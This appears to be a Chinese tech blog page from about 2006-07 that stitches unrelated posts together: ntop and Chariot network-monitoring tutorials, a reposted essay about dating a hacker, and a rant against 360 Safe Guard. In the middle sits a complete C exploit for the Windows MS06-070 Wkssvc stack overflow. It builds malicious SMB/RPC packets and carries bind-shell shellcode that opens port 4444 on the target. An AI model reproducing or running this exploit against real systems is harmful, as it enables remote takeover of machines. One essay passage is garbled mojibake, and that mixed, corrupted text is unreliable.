订阅数:73488
订到火车票了,订成功8张票,取了5张票,真爽,就快回家了!这里还得感谢华仔我的哥们一起的努力的打电话,嘎嘎!
去年11月中旬的时候写了一篇《流量控制软件ntop的安装》,ntop有个非常优秀的功能就是支持cisco netflow协议,当时只是ntop的简单安装,因为最近都比较忙,与对其netflow的功能一直都没有太多时间去研究,2007了,元旦三天假,前两天都玩去了,趁这第三天有时间在家,就花点时间搞搞ntop了
用到的软件有
Ntop 3.2
(下载 www.ntop.org)
NetflowExporter 0.1.25
(下载 http://sunsite.cc.ncu.edu.tw/download.php/NetflowExporter-0.1.25.tgz)
RedHat AS4 一台
FreeBSD 5.4 一台
写得比较简单,各位大大不要笑话我 :)
利用Chariot Endpoint 测试网络吞吐量
Writer:刘启明
Email: heroot@gmail.com
利用软件:
Chariot 5.4 (下载http://www.piaodown.com/down/soft/19431.htm)
Endpoint 5.1 (下载http://www.netiq.com/support/pe/pe.asp)
Chariot介绍
Chariot是顶尖的网络业务和性能测试软件之一,能够模拟众多的商业应用进行测试,例如HTTP、FTP、AD、Exchange、SQL、Oracle和SAP等;
Chariot是目前世界上唯一认可的应用层IP网络及网络设备的测试软件,可提供端到端,多操作系统,多协议测试,多应用模拟测试,其应用范围包括有线,无线,局域,广域网络及网络设备;可以进行网络故障定位,用户投诉分析,系统评估,网络优化等。从用 户角度测试网络或网络参数(吞吐量,反应时间,延时,抖动,丢包等)。
Chariot工作原理:
Chariot和一般的网管系统及一些在线监测系统有本质上的不同。网管系统及一些在线监测系统采取被动式监视,而Chariot采用主动式监视及测量;网管系统及一些在线监测系统提供定性的测量,而Chariot采取定量的测量。
Chariot测试原理是通过产生模拟真实的流量,采用End to End的方法测试网络设备或网络系统在真实环境中的性能。能够广泛应用在SWITCH,ROUTER,WIRELESS,QoS,MULTICASTING及网络等方面的功能和性能测试。
Chariot的基本组成包括Chariot控制台和Endpoint.其中Chariot控制台可以运行于Microsoft的各种Windows平台。在Chariot控制台上可以定义各种可能的测试拓扑结构和测试业务类型。Endpoint可以运行 在几乎目前流行的所有操作系统上。Chariot Endpoint能够充分利用运行主机的资源,执行Chariot控制台发布的Script命令,从而完成需要的测试。具体的工作流程图见下图
Chariot测试实例
测试交换机
测试路由器
测试防火墙
测试无线链路
实际应用:
通过一个最简单的实例来介绍Chariot5.4的使用。通过Chariot可以测量出网络中任意两个节点之间的真实的最大带宽,这样就不会被ISP欺骗花高价钱享受低带宽了。
测量网络中任意两个节点的带宽:
任务描述:
经常有人反映网络速度缓慢,那么怎样确定网络间带宽是多少呢?SNIFFER只能抓包不能给出实际带宽,这时候就需要Chariot来帮忙了。我们假定要测量网络中A计算机192.168.1.10与B计算机192.168.1.11之间的实际带宽。
实现方法:
第一步:安装Endpoint,下载Endpoint,上面已经给出下载地址,在A、B两台机上安装Endpoint,安装之后Endpoint会自行起动,打开任务管理器会发现多了Endpoint支持的操作系统多了一个Endpoint.exe进程
Endpoint支持的操作系统有:Compaq Tru64 UNIX、FreeBSD UNIX、HP-UX、IBM AIX、IBM MVS、IBM OS/2、Linux 、Linux IA-64、Microsoft Windows 3.1、Microsoft Windows 95、Microsoft Windows 98/Windows Me、Microsoft Windows NT/2000/XP/XP(64-bit)、Novell Netware、Sco UNIXWare、SGI IRIX、Spirent Communications TeraMetrics、Sun Solaris。
第二步:安装Chariot,在另一台机器上安装Chariot,也可以在A、B其中的一台机上安装Chariot,这里安装在另一台机器上,IP为192.168.1.12,Chariot只能安装在Windows系统上
第三步:配置Chariot,主界面中点NEW按钮,弹出的界面中点上方一排按钮的ADD PAIR,在ADD AN ENDPOINT PAIR窗口中输入PAIR名称,然后在ENDPOINT1处输入A计算机的IP地址192.168.1.10,在ENDPOINT2处输入B计算机的IP地址192.168.1.11.按select script按钮并选择一个脚本,由于我们是测量带宽所以选择软件内置的脚本High Performance Throughput
第四步:确定后我们点主菜单的RUN启动测量工作,当然直接点上面一排里的RUN按钮也是可以的,之后软件会测试100个数据包从A计算机发送到B计算机。由于软件默认的传输数据包很小所以很快测量工作就结束了。在结果中我们点THROUGHPUT标签可以查看具体测量的带宽大小。如图显示了A与B计算机之间的实际最大带宽为93.065Mbp/S。
这里通过一个最简单的实例介绍了Chariot的基本功能和工作原理并带着大家完成了一个最简单的带宽吞吐量测量例子,Chariot功能是强大的,很多技巧可以帮助我们测量得更加准确更加具有权威性。
欢迎对这方面有了解或兴趣的朋友们与我交流 J
测试文档下载
http://www.i170.com/attach/8F7884D5-9510-4C5B-9C2F-4605283A28B1
转自牛B的人
猪猪的blog
/***************************************************************************
Microsoft Windows Wkssvc NetrjoinDomain2 Stack Overflow(MS06-070) Exploit
by cocoruder(frankruder_at_hotmail.com),2006.11.15
page:http://ruder.cdut.net/default.asp
successfully test on Windows 2000 Server SP4(chinese)
usage:
ms06070 targetip DomainName
notice:
Make sure the DomainName is valid and live,more informations see
http://research.eeye.com/html/advisories/published/AD20061114.html,
cocoruder just research the vulnerability and give the exploit for
Win2000.
****************************************************************************/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <tchar.h>
unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";
unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";
unsigned char NTcreate_AndX_Request[]=
"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
unsigned char Rpc_Bind_Wkssvc[]=
"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
unsigned char Rpc_NetrjoinDomain2_Header[]=
"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
"\x00\x00\x00\x00"
"\x16\x00" //opnum,NetrjoinDomain2
"\x30\x2a\x42\x00"
"\x0e\x00\x00\x00"
"\x00\x00\x00\x00"
"\x0e\x00\x00\x00"
"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
"\x00\x00"
"\x10\x01\x00\x00"
"\x00\x00\x00\x00"
"\x10\x01\x00\x00";
unsigned char Rpc_NetrjoinDomain2_End[]=
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x00\x00\x00\x00"
"\x01\x00\x00\x00";
unsigned char *lpDomainName=NULL;
DWORD dwDomainNameLen=0;
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
DWORD fill_len_1 =0x84c; //fill data
DWORD fill_len_2 =0x1000; //fill rubbish data
DWORD addr_jmp_ebx=0x77f81573; //jmp ebx address,in ntdll.dll
unsigned char code_jmp8[]= //jmp 8
"\xEB\x06\x90\x90";
unsigned char *Rpc_NetrjoinDomain2=NULL;
DWORD dwRpc_NetrjoinDomain2=0;
unsigned char recvbuff[2048];
void showinfo(void)
{
printf("Microsoft Windows Wkssvc NetrjoinDomain2 Stack Overflow(MS06-070) Exploit\n");
printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
printf("page:http://ruder.cdut.net/default.asp\n\n");
printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
printf("usage:\n");
printf("ms06070 targetip DomainName\n\n");
printf("notice:\n");
printf("Make sure the DomainName is valid and live,more informations
see\n");
printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
}
void neg ( int s )
{
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}
void MakeAttackPacket(char *lpDomainNameStr)
{
DWORD j,len,b_flag;
dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
memset(lpDomainName,0,dwDomainNameLen);
MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
*(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
*(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
len=dwDomainNameLen+ //DomainName
fill_len_1-3*2+ //fill_len_1
4+ //jmp 8
4+ //addr jmp ebx
sizeof(shellcode)-1+ //shellcode
fill_len_2+ //fill_len_2
2; //0x0000
b_flag=0;
if (len%2==1)
{
len++;
b_flag=1;
}
dwRpc_NetrjoinDomain2=sizeof(Rpc_NetrjoinDomain2_Header)-1+
len+
sizeof(Rpc_NetrjoinDomain2_End)-1; //end
//malloc
Rpc_NetrjoinDomain2=(unsigned char *)malloc(dwRpc_NetrjoinDomain2);
if (Rpc_NetrjoinDomain2==NULL)
{
printf("malloc error!\n");
return;
}
//fill nop
memset(Rpc_NetrjoinDomain2,0x90,dwRpc_NetrjoinDomain2);
j=sizeof(Rpc_NetrjoinDomain2_Header)-1;
//update para1 length
*(DWORD *)(Rpc_NetrjoinDomain2_Header+j-0x0c)=len/2;
*(DWORD *)(Rpc_NetrjoinDomain2_Header+j-0x04)=len/2;
//copy header
memcpy(Rpc_NetrjoinDomain2,Rpc_NetrjoinDomain2_Header,sizeof(Rpc_NetrjoinDomain2_Header)-1);
j=sizeof(Rpc_NetrjoinDomain2_Header)-1;
//copy DomainName
memcpy(Rpc_NetrjoinDomain2+j,lpDomainName,dwDomainNameLen);
j=j+dwDomainNameLen;
//calculate offset
j=j+fill_len_1-3*2;
//jmp 8
memcpy(Rpc_NetrjoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
j=j+4;
//jmp ebx address
*(DWORD *)(Rpc_NetrjoinDomain2+j)=addr_jmp_ebx;
j=j+4;
//copy shellcode
memcpy(Rpc_NetrjoinDomain2+j,shellcode,sizeof(shellcode)-1);
j=j+sizeof(shellcode)-1;
//fill data
memset(Rpc_NetrjoinDomain2+j,0x41,fill_len_2);
j=j+fill_len_2;
//0x0000(NULL)
if (b_flag==0)
{
Rpc_NetrjoinDomain2[j]=0x00;
Rpc_NetrjoinDomain2[j+1]=0x00;
j=j+2;
}
else if (b_flag==1)
{
Rpc_NetrjoinDomain2[j]=0x00;
Rpc_NetrjoinDomain2[j+1]=0x00;
Rpc_NetrjoinDomain2[j+2]=0x00;
j=j+3;
}
//copy other parameter
memcpy(Rpc_NetrjoinDomain2+j,Rpc_NetrjoinDomain2_End,sizeof(Rpc_NetrjoinDomain2_End)-1);
j=j+sizeof(Rpc_NetrjoinDomain2_End)-1;
}
void main(int argc,char **argv)
{
WSADATA ws;
struct sockaddr_in server;
SOCKET sock;
DWORD ret;
WORD userid,treeid,fid;
showinfo();
return;
WSAStartup(MAKEWORD(2,2),&ws);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((USHORT)445);
printf("[+] Connecting %s\n",argv[1]);
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("connect error!\n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(WORD *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(WORD *)(recvbuff+0x1c); //get treeid
//send NTcreate_AndX_Request
memcpy(NTcreate_AndX_Request+0x20,(char *)&userid,2); //update userid
memcpy(NTcreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char
*)NTcreate_AndX_Request,sizeof(NTcreate_AndX_Request)-1,0);
if (ret<=0)
{
printf("send NTcreate_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
fid=*(WORD *)(recvbuff+0x2a); //get fid
//rpc bind
memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
*(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
if (ret<=0)
{
printf("send Rpc_Bind_Wkssvc error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
MakeAttackPacket((char *)argv[2]);
memcpy(Rpc_NetrjoinDomain2+0x20,(char *)&userid,2);
memcpy(Rpc_NetrjoinDomain2+0x1c,(char *)&treeid,2);
memcpy(Rpc_NetrjoinDomain2+0x43,(char *)&fid,2);
*(DWORD *)Rpc_NetrjoinDomain2=htonl(dwRpc_NetrjoinDomain2-4);
*(WORD *)(Rpc_NetrjoinDomain2+0x27)=dwRpc_NetrjoinDomain2-0x58; //update Total Data Count
*(WORD *)(Rpc_NetrjoinDomain2+0x3b)=dwRpc_NetrjoinDomain2-0x58; //update Data Count
*(WORD *)(Rpc_NetrjoinDomain2+0x45)=dwRpc_NetrjoinDomain2-0x47; //update Byte Count
*(WORD *)(Rpc_NetrjoinDomain2+0x60)=dwRpc_NetrjoinDomain2-0x58; //update Frag Length
ret=send(sock,(char *)Rpc_NetrjoinDomain2,dwRpc_NetrjoinDomain2,0);
if (ret<=0)
{
printf("send Rpc_NetrjoinDomain2 error!\n");
return;
}
printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
closesocket(sock);
}
// HackerSpirit.com [2006-11-16]
操作系统
Red Hat Enterprise Linux AS release 4
安装包
ntop-3.2-1.el4.rf.i386.rpm
下载地址
ftp://ftp.pbone.net/mirror/dag.wieers.com/packages/ntop/ntop-3.2-1.el4.rf.i386.rpm
1.安装
rpm -ivh ntop-3.2-1.el4.rf.i386.rpm
2.首次启动(root)
/usr/bin/ntop -P /usr/share/ntop -u ntop -A
#-P [directory]指定.db档存放路径
#-u [user]指定service启动user
#-A 设定admin密码,ntop会内建admin管理者帐号于ntop中
3.编辑/etc/ntop.conf档
vi /etc/ntop.conf
内容如下:
#eth0 是我的单块网卡 lo是回路
--interface eth0,lo
#--no-mac
#由于我只是一台机器所以下面的没加,如果您是在路由器或网关上请把对应的ip段改成自己的
--local-subnets 192.168.10.0/24
#运行端口
--http-server 3000
#数据库存放路径
--db-file-path /usr/share/ntop
#守护进程方式运行
--daemon
#用户名
--user ntop
#默认运行等级
--trace-level 3
#跳过所有错误
--disable-schedyield
4.启动ntop
/etc/init.d/ntop start
5.查看网络流量
http://localhost:3000/
6.停止为
/etc/init.d/ntop stop
附上两个图片
信息来源:小榕无心呢喃
文章作者:Ring猫咪
和他在一起是第38天了,漫长的日子仿佛一瞬间而已。
我坐在电脑这头,他在网络另一头回应我的呼喊。我想这样是完美的,至少我们都可以给对方最多的幻想,让彼此有时间和空间去幻想对方的好,忽略一切不美好的事情。这就是网络的魅力。我是要感激吗?
是的,我爱上了个黑客。
先解释为什么我非要爱黑客不可呢?我很喜欢电脑,虽然我是学法律的,在法律的圈子里我找到的是官场和政治的束缚,我要自由确无处可找。于是我宁愿要电脑不要老公。认识我的朋友全部都知道。那么要想两全其美就只可能找个精通计算机的老公。就这么简单的原因。
遇见他,是幸运还是老天爷的玩笑?
他深私一湖不可见底的池水,你永远猜不透他在做什么。
今天你还在学习旁注,可是他已经开始看脱壳的教程了,好不容易会一点点脱壳的东西,他又开始研究什么木马。我不管多么努力,永远都是在他身后追逐。
有时候我觉得我很幸福,圣诞节的时候他会做个世界上独一无二的程序给你,上面写着你的名字……说明我也是他的独一无二;然后我有不明白的问题他会给我做个动画让我明白;还有我永远忘不了他邀请我到他电脑里面捣乱,他就静静地看着,什么也不说,什么也不做,就这样看着,任凭你象个小孩子般乱翻他的文件。他也会很宠我,尽管我已经千百次给自己说“他忙的时候别和他聊天”,可是忍不住打扰他了,他却在第一时间回复我;还有他忙过了会陪我打泡泡,我们一起打,两个人菜得可以,他也不厌其烦地陪我打,尽管他不是很喜欢泡泡,当你不小心中招了,他突然停止一切活动,只是看着你,不忍心“杀”死我;还有,我写的每一篇文章他都会去看,我说的每一句话他都记得,我的每个小小要求他都记在心中,我的每次任性他都纵容了;他有10个QB的话会记得给我9个;他知道我睡觉前没听他说“晚安”就不安稳,所以他夜夜和我说晚安;他会记得经常检查我BLOG的漏洞,然后立刻补好,也会帮我备份;我要的任何软件刚说出口他就立刻给我传过来;在2004年最后一秒2005年第一秒他会亲昵地对我说“新年快乐”;我这里下第一场雪的时候他会陪我一起开心;即使一个问题我问了N次,他也会尽量耐心地再次给我解释;我想要恶作剧的时候你总是第一个支持我的人;我唠叨的时候你总是静静听我说……
可是爱你是很辛苦的事情你知道吗?有时候我在想你要是个普通男人该有多好?我们都不会电脑,都不让自己的生活腻在电脑面前,然后我们的每一天都不是从打开电脑开始,那有多好啊?这样也许我们可以笑看初雪,临窗听雨……我们不用说那么多不属于我们两个人的话题。现在想想,我们聊的话题除了电脑外,没别的另我们兴奋了。我们是在和彼此恋爱,不是电脑不是吗?经常你就研究我永远也不明白的木马好多天,究竟木马是你的恋人还是我?我是木马就好了,这样你花在我身上的心思也会比较多啊……你爱我吗?你说爱的时候是真心的吗?你有梦见过我吗?看不见我的时候你会想念我吗?你记得我喜欢吃的东西吗?你想知道我在做什么吗?为什么你的问题那么少?为什么你就不愿意和我将心掏出来好好聊聊呢?我爱你,即使你不是黑客,即使你缺鼻子少眼,我还是不可自拔地爱你啊!我不愿意你只是一时冲动就和我在一起,我怕伤害你,更怕被你伤害啊!是我们彼此太尊重彼此了吗?是我们彼此太珍惜对方了吗?以至于让我本来很坚定很明亮的心开始模糊了!
是的,和一个黑客谈恋爱。要做好以下心理准备:
1.可能你永远追不上他的速度。所以你要比任何女人都努力。你起码要会一样他最不拿手的东西。如果他不擅长编程,那么这个就是你要奋斗的目标。怎么说呢?我曾经学垃圾VF的时候写的程序冗长又复杂,在学习VB的时候写的程序自己都不知道在弄什么,简直可以说是乱七八糟。但是你还是要拼命学,因为说不定哪天他对编程感兴趣的时候你就有话说了。
2.你不仅要会计算机,还要会一个女人应该会的全部知识。他会很忙,忙到不知道怎么照顾你,所以你要学煮饭,会理家,最好是做个全能的女人。照顾他是你必须的,谁叫你爱他?他也许睡觉的时候不安稳,所以你要做好以后半夜起床给他盖被子的心理准备。他也许忙得忘记吃饭,那么你要练习怎么给小孩子喂饭,是的,你今后还要给他一口一口喂他。
3.你要懂得什么叫安静。你要知道,一个在电脑前工作的男人是很讨厌被人打断思维的那种感觉。你永远不要指望他在第一时间给你回复,他连吃饭都可以忘记,更何况你说的话呢?当然,他也许记得你说的话,可是他不会说“我知道了”,得到一句“恩”已经是奇迹了。我的经历是他收到了留言就立刻给我做好我想要的事情,但是他不会给你说“我做好了”,于是你必须自己再去看他究竟有没有做。总之,你不要在他工作的时候和他聊天,更不要成天给他说垃圾话题,什么“今天你开心吗?”“你爱我吗?”他没有时间回答的。他爱你也不会成天说,建议当他说爱你的时候拿软件录音,然后想问他的时候放给自己听。还有,他如果10分钟之内没有回你的问题那么他一定是忙,不想自讨苦吃就别去继续打扰他。
4.和他恋爱是很寂寞的事情。我从来没有想过以后和他牵手逛街,没有想过和他到国外过圣诞节,没有想过和他去看大海。他宁愿坐在电脑前对着屏幕发呆也不愿意和你出门。你真要爱他的话最好就找姐妹去逛街吧。还有,以后开同学会的时候尽量找个周围有网吧的地方,这样他和你的朋友见面之后就可以去上网。否则他会觉得你在浪费他的时间。你不开心的时候最好自己解决,别去烦他,他忙,可能他正在和一个顽固的网站斗争,他正一肚子火,没精力处理你的问题。 (转载人:我不同意)
5.最好放弃美容。相信我,要想爱他又美容是不可能的。通常黑客在半夜活动。什么10点睡美容觉就忍了吧,他总是习惯在凌晨2点给你说“晚安”,如果想得到他的祝福那么就准备一罐咖啡,然后再准备一本最好是《追忆似水年华》那样的书,一边看一边等待吧。如果他真的2点都没有给你回应,那么最好你立刻准备点夜宵的陪他通宵。我最近没哪天是2点前睡觉的。
6.等待是家常便饭。是的,你想问他个问题吗?你想和他谈穆穑亢玫模肽托牡却似玫幕八芸炀拖邢吕矗似缓镁图柑斓难影伞;购茫业奈侍舛际堑碧旖饩龅摹;褂校淮氖虑樗换岬谝皇奔渫瓿傻模撬笔比肥得挥惺虑樽觥H缓竽阋茸藕退峄椋亢玫模心愕鹊模人瓿勺约旱拿蜗朐偎蛋伞?
7.你看着他就好了。相信我,他凝视电脑的时间永远比注视你的时间多。那些“你看我今天有没有什么变化”的愚蠢问题千万不要问。他可能注意到今天XX病毒出变种了,XX程序有新漏洞了,可是你别想他注意到你换了个新发型。他是工作狂人,你要体贴他,更别生气地说“你看着我的眼睛”,你的眼睛或许永远没有木马有魅力。
8.随时做好被冷落的准备。他可能一天也不会和你说半句话,恩,是的,还是那个来原因,他忙啊。
9.学习好最基本的计算机常识。不会拿最简单的WEBSHELL就别和他恋爱了。他可能更有兴趣对你说他今天是怎么成功黑了一个站点,如果你觉得无聊那么最好尽快和他分手.你要百分百爱计算机,我相信没有黑客GG愿意接受一个讨厌计算机的女生,你们在一起是个错误,今天不分手明天也会分手的。(转载人:没关系了)
10.甜言蜜语永远由你来说。好的,他是个语言大师——计算机语言,你没有发现他和计算机对话的时间长过和你对话的时间吗?他爱你或许不知道怎么表达,一句“我爱你”就够了,真的,这是他全部感情的表达,你要体谅他的词穷,更或许他会做个你用不来的程序讨你的欢喜,你不懂不要紧,你不开心也别表现出来,你想想,他能花时间给你做个东东出来已经说明他把你放在很重要的位置了,不是吗?你不开心也要装作很开心,说“老公,你好好哦,我爱你”你不懂也没关系,就说“哇!做得好棒啊!真有意思啊!
360安全卫士一个以炒作为生的“民意代表”
360安全卫士(周先生的智慧星)---中国软件业的炒作之星
最近听说同志又有新作了传说中的流氓软件克星,国内比较有意思。
社会发展了:流氓燕,芙蓉姐姐也上来了,最大流氓3721的始作蛹者也开始反
对自己了。(哎,谁让这个社会现在喜欢炒,谁让这个社会迷失了方向)。
让我们看看传说的360安全卫士吧,一个举着民意大棋的比打劫还没有技术
含量的一个靠纯炒作及捆绑卡巴杀毒软件的大文件名比较器吧!!!!!!
从奇虎网站上下载了最新的360安全卫士2.0预烂版。飞快的安装上了我的
电脑看看安装目录,还真是小。3M多,最大的文件1M左右(libsypwa)。打开
看看了,靠,居然最多的是"0".... -_-! 估计有用的数据不到100k吧。哈哈。
整个软件比较简单居然没有几个文件组成。有兴趣的可以自己反下看看。。其
中在system32\drivers目录下有一个名为:pnpXXXXX.sys (xxxxx是数字)比较搞
笑。就是一个占茅坑的drivers(占了一些如yahoo助手等使用的驱动的坑)一个非
常典型的流氓软件手法。
看着软件的体积这么小(有个打肿脸的充数文件)还有pnpxxxxx.sys里的一些
直接删除指定路径文件的做法。让我有点冒汗,不会吧,知道计算机编程的人都知
道这样做好像太“外行”了吧。不禁对360的查流氓软件的实现机理有了兴趣。
这下不看不要紧,一看吓了一大跳。。。原来收购中国软件业第一大骗局的“智慧星”
高深技术的那位“高科公司老总就是周鸿袆同志!!!!”。太可怕了。这个在媒体上
炒的火热的流氓软件克星,居然.....哎。。多的不说了。有兴趣的朋友自己可以试试。
